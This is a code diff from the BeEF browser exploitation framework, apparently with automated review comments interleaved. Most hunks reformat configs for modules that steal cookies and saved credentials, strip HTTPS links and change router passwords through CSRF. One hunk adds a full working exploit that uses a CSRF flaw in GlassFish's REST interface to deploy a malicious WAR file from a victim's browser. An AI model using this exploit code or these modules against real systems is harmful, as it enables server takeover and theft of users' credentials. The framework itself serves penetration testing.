diff --git a/install-beef b/install-beef index 2669588ff..5428316c6 100644 --- a/install-beef +++ b/install-beef @@ -1,3 +1,4 @@ +#!/bin/bash # # Copyright 2012 Wade Alcorn wade@bindshell.net # diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml index dfcab7cf8..ee2921948 100644 --- a/modules/browser/get_visited_domains/config.yaml +++ b/modules/browser/get_visited_domains/config.yaml @@ -22,5 +22,5 @@ beef: description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: - working: ["FF","IE"] - not_working: ["O","C","S"] + working: ["FF", "IE"] + not_working: ["O", "C", "S"] diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml index fb4f54fc8..8216f7223 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml @@ -17,11 +17,11 @@ beef: module: ajax_fingerprint: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Fingerprint Ajax" description: "Fingerprint Ajax and JS libraries present on the hooked page." authors: ["qswain"] target: - working: ["FF","S"] + working: ["FF", "S"] not_working: ["C"] diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml index a5572a41d..2b9c05a1b 100644 --- a/modules/browser/hooked_domain/alert_dialog/config.yaml +++ b/modules/browser/hooked_domain/alert_dialog/config.yaml @@ -17,7 +17,7 @@ beef: module: alert_dialog: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Create Alert Dialog" description: "Sends an alert dialog to the hooked browser." authors: ["wade", "bm"] 
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index 22e8fdd4d..8d57a6cfe 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml @@ -17,7 +17,7 @@ beef: module: deface_web_page: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace Content (Deface)" description: "Overwrite the page, title and shortcut icon on the hooked page." authors: ["antisnatchor"] diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml index b535101ef..a5670e31e 100644 --- a/modules/browser/hooked_domain/get_cookie/config.yaml +++ b/modules/browser/hooked_domain/get_cookie/config.yaml @@ -17,7 +17,7 @@ beef: module: get_cookie: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Cookie" description: "This module will retrieve the session cookie from the current page." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml index 2d6d5a011..f008244b3 100644 --- a/modules/browser/hooked_domain/get_local_storage/config.yaml +++ b/modules/browser/hooked_domain/get_local_storage/config.yaml @@ -17,7 +17,7 @@ beef: module: get_local_storage: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Local Storage" description: "Extracts data from the HTML5 localStorage object." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml index 77e2e9109..a4e51a376 100644 --- a/modules/browser/hooked_domain/get_page_html/config.yaml +++ b/modules/browser/hooked_domain/get_page_html/config.yaml 
@@ -17,7 +17,7 @@ beef: module: get_page_html: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Page HTML" description: "This module will retrieve the HTML from the current page." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml index fd0422e2e..1b1ed13f3 100644 --- a/modules/browser/hooked_domain/get_page_links/config.yaml +++ b/modules/browser/hooked_domain/get_page_links/config.yaml @@ -17,7 +17,7 @@ beef: module: get_page_links: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Page HREFs" description: "This module will retrieve HREFs from the target page." authors: ["vo"] diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml index 417d52853..39d1cff08 100644 --- a/modules/browser/hooked_domain/get_session_storage/config.yaml +++ b/modules/browser/hooked_domain/get_session_storage/config.yaml @@ -17,7 +17,7 @@ beef: module: get_session_storage: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Session Storage" description: "Extracts data from the HTML5 sessionStorage object." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml index ad865fbc1..1c01a0391 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml +++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml @@ -17,7 +17,7 @@ beef: module: get_stored_credentials: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Stored Credentials" description: "This module retrieves saved username/password combinations from the login page on the hooked domain.

It will fail if more than one set of domain credentials are saved in the browser." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml index a2420dcae..f458eb1e0 100644 --- a/modules/browser/hooked_domain/link_rewrite/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs" description: "This module will rewrite all the href attributes of all matched links." authors: ["passbe"] diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml index ab5dbbee4..176ec2f69 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite_sslstrip: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs (HTTPS)" description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index 163bf3056..b4a20fe33 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml 
@@ -17,10 +17,10 @@ beef: module: mobilesafari_address_spoofing: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "iOS Address Bar Spoofing" description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')" - authors: ["bcoles","xntrik","majorsecurity.net"] + authors: ["bcoles", "xntrik", "majorsecurity.net"] target: working: S: diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml index 8b3f21ac4..0f9035279 100644 --- a/modules/browser/hooked_domain/prompt_dialog/config.yaml +++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml @@ -17,7 +17,7 @@ beef: module: prompt_dialog: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Create Prompt Dialog" description: "Sends a prompt dialog to the hooked browser." authors: ["wade", "bm"] diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml index 9fb293c7e..f8ddbcda0 100644 --- a/modules/browser/hooked_domain/replace_video/config.yaml +++ b/modules/browser/hooked_domain/replace_video/config.yaml @@ -17,7 +17,7 @@ beef: module: replace_video: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace Videos" description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)." authors: ["Yori Kvitchko", "antisnatchor"] diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml index d8014fcc2..f86c183fa 100644 --- a/modules/browser/hooked_domain/rickroll/config.yaml +++ b/modules/browser/hooked_domain/rickroll/config.yaml 
@@ -17,7 +17,7 @@ beef: module: rickroll: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (Rickroll)" description: "Overwrite the body of the page the victim is on with a full screen Rickroll." authors: ["Yori Kvitchko"] diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml index 306c3e7a2..3c9681e0a 100644 --- a/modules/browser/hooked_domain/site_redirect/config.yaml +++ b/modules/browser/hooked_domain/site_redirect/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser" description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input." authors: ["wade", "vo"] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index 9e5d349c3..ad73b2efe 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect_iframe: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (iFrame)" description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." authors: ["ethicalhack3r", "Yori Kvitchko"] diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml index 2920b7a84..af3d4a3f0 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml +++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml @@ -19,7 +19,7 @@ beef: module: Dlink_dcs_series_csrf: enable: true - category: ["Exploits","Camera"] + category: ["Exploits", "Camera"] name: "Dlink DCS series CSRF" description: "Attempts to change the password on a Dlink DCS series camera." authors: ["bcoles"] diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js new file mode 100644 index 000000000..a7d2744ad --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/command.js 
@@ -0,0 +1,224 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com +// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html + + +beef.execute(function() { + var restHost = '<%= @restHost %>'; + var warName = '<%= @warName %>'; + var warBase = '<%= @warBase %>'; + + var logUrl = restHost + '/management/domain/applications/application'; + + //BEGIN Daniel Guerrero binary Base64-library +/* +Copyright (c) 2011, Daniel Guerrero +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of the Daniel Guerrero nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +/** + * Uses the new array typed in javascript to binary base64 encode/decode + * at the moment just decodes a binary base64 encoded + * into either an ArrayBuffer (decodeArrayBuffer) + * or into an Uint8Array (decode) + * + * References: + * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer + * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array + */ + +var Base64Binary = { + _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + /* will return a Uint8Array type */ + decodeArrayBuffer: function(input) { + var bytes = Math.ceil( (3*input.length) / 4.0); + var ab = new ArrayBuffer(bytes); + this.decode(input, ab); + + return ab; + }, + + decode: function(input, arrayBuffer) { + //get last chars to see if are valid + var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); + var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); + + var bytes = Math.ceil( (3*input.length) / 4.0); + if (lkey1 == 64) bytes--; //padding chars, so skip + if (lkey2 == 64) bytes--; //padding chars, so skip + + var uarray; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + var j = 0; + + if (arrayBuffer) + uarray = new Uint8Array(arrayBuffer); + else + 
uarray = new Uint8Array(bytes); + + input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); + + for (i=0; i> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + uarray[i] = chr1; + if (enc3 != 64) uarray[i+1] = chr2; + if (enc4 != 64) uarray[i+2] = chr3; + } + + return uarray; + } +} + //END Daniel Guerrero binary Base64-library + + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + function fileUpload(fileData, fileName) { + boundary = "HELLOWORLD270883142628617", + uri = logUrl, + xhr = new XMLHttpRequest(); + + var additionalFields = { + asyncreplication: "true", + availabilityenabled: "false", + contextroot: "", + createtables: "true", + dbvendorname: "", + deploymentplan: "", + description: "", + dropandcreatetables: "true", + enabled: "true", + force: "false", + generatermistubs: "false", + isredeploy: "false", + keepfailedstubs: "false", + keepreposdir: "false", + keepstate: "true", + lbenabled: "true", + libraries: "", + logReportedErrors: "true", + name: "", + precompilejsp: "false", + properties: "", + property: "", + retrieve: "", + target: "", + type: "", + uniquetablenames: "true", + verify: "false", + virtualservers: "", + __remove_empty_entries__: "true" + } + + + var fileFieldName = "id"; + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. 
+ xhr.withCredentials = "true"; + xhr.onreadystatechange = function() { + if (xhr.readyState == 4) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); + } + } + + var body = ""; + + for (var i in additionalFields) { + if (additionalFields.hasOwnProperty(i)) { + body += addField(i, additionalFields[i], boundary); + } + } + + body += addFileField(fileFieldName, fileData, fileName, boundary); + body += "--" + boundary + "--"; + xhr.setRequestHeader('Content-length', body.length); + xhr.sendAsBinary(body); + return true; + } + + function addField(name, value, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; + c += value + "\r\n"; + return c; + } + + function addFileField(name, value, filename, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; + c += "Content-Type: application/octet-stream\r\n\r\n"; + + for(var i = 0; i< value.length; i++){ + c+=String.fromCharCode(value[i] & 0xff); + } + + c += "\r\n"; + return c; + } + + + function start() { + fileUpload(Base64Binary.decode(warBase),warName); + } + + start(); + +}); + diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml new file mode 100644 index 000000000..b92c453c9 --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml 
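Review bot: In `fileUpload`, `boundary`, `uri` and `xhr` are assigned in one comma-chained statement with no `var`, so all three become properties of the page's global object instead of locals; declare them with `var boundary = "HELLOWORLD270883142628617", uri = logUrl, xhr = new XMLHttpRequest();`. In the same function `xhr.withCredentials = "true"` assigns a string where the property is a boolean, so `xhr.withCredentials = true;` states the intent. In the bundled Base64 helper, `lkey1` and `lkey2` are both read from `input.charAt(input.length-1)`, which looks like a copy error, since the second padding check would normally read `input.length-2`. The `onreadystatechange` handler logs "completed" at `readyState == 4` without consulting `xhr.status`, so a one-line comment saying the message does not indicate whether the server accepted the request would keep the log from being over-read.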
@@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + glassfish_war_upload_xsrf: + enable: true + category: "Exploits" + name: "GlassFish WAR Upload XSRF" + description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.
For more information refer to http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html." + authors: ["Bart Leppens"] + target: + working: ["FF", "S", "C"] diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb new file mode 100644 index 000000000..a18ca8cd4 --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb @@ -0,0 +1,32 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Glassfish_war_upload_xsrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'restHost', 'ui_label'=>'Host', 'type' => 'textarea', 'value' =>'http://glassfishserver:4848', 'width' => '400px', 'height' => '25px'}, + {'name' => 'warName', 'ui_label' => 'Filename', 'value' => 'hello.war', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }, + {'name' => 'warBase', 'ui_label' => 'Base64 of exploit', 'value' => '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', 'type' => 'textarea', 'width' => '400px', 'height' => '800px' } + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml index 022045eb9..39034eba7 100644 --- a/modules/exploits/router/bt_home_hub_csrf/config.yaml +++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml 
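Review bot: `category: "Exploits"` is a plain string, while every other module config touched in this commit gives `category` as a list (`["Exploits", "Router"]`, `["Exploits", "Camera"]`). If the loader expects the list form, write `category: ["Exploits"]` or add a sub-category to match the siblings. The `description` also has a raw line break inside the double-quoted scalar, which YAML folds to a single space; if a visible break is intended, use an explicit `\n` as the get_visited_domains description does.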
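Review bot: The default for `warBase` in `self.options` (labelled 'Base64 of exploit') appears to be an embedded encoded archive with no record of what it contains or how it was built, so a reviewer cannot audit the binary that ships in the repository. Add a comment above the option recording its origin, e.g. `# warBase default: base64 of <ARTIFACT_NAME>, built from <SOURCE_LOCATION>, sha256 <DIGEST>` (placeholders to fill in), or leave the default empty. Separately, `post_execute` stores `@datastore['result']`, but the string command.js passes to `beef.net.send` in this commit carries no `result=` key that is visible here, so the stored value may be empty; confirm against how the other modules report.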
@@ -17,7 +17,7 @@ beef: module: bt_home_hub_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "BT Home Hub CSRF" description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router." authors: ["bcoles"] diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml index b502288f1..c579a47b9 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: comtrend_ct5367_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Comtrend CT-5367 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router." authors: ["bcoles"] diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml index fe71d96bf..27f47c06e 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: comtrend_ct5624_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Comtrend CT-5624 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router." authors: ["bcoles"] diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml index aab56869a..d7e6ace24 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml +++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml 
@@ -17,7 +17,7 @@ beef: module: dlink_dsl500t_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "D-Link DSL500T CSRF" description: "Attempts to change the password on a D-Link DSL500T router." authors: ["bcoles"] diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml index 0ccbe8c1d..d12a65130 100644 --- a/modules/exploits/router/huawei_smartax_mt880/config.yaml +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml @@ -17,7 +17,7 @@ beef: module: Huawei_smartax_mt880_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Huawei SmartAX MT880 CSRF" description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router." authors: ["bcoles"] diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml index 790045b2f..d3308de95 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml +++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: linksys_befsr41_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys BEFSR41 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router." authors: ["Martin Barbella"] diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml index de9c1162d..a64dd89fd 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml 
@@ -17,7 +17,7 @@ beef: module: linksys_wrt54g2_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys WRT54G2 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router." authors: ["Martin Barbella"] diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml index a85f8d5f4..4129d26e1 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: linksys_wrt54g_csrf: enable: true - category: ["Exploits","Router"] + category: ["Exploits", "Router"] name: "Linksys WRT54G CSRF" description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router." authors: ["Martin Barbella"] diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml index 42798a2d3..6402686d4 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml +++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml @@ -17,7 +17,7 @@ beef: module: Netgear_gs108t_csrf: enable: true - category: ["Exploits","Switch"] + category: ["Exploits", "Switch"] name: "Netgear GS108T CSRF" description: "Attempts to change the password on a Netgear GS108T managed switch." authors: ["Bart Leppens"]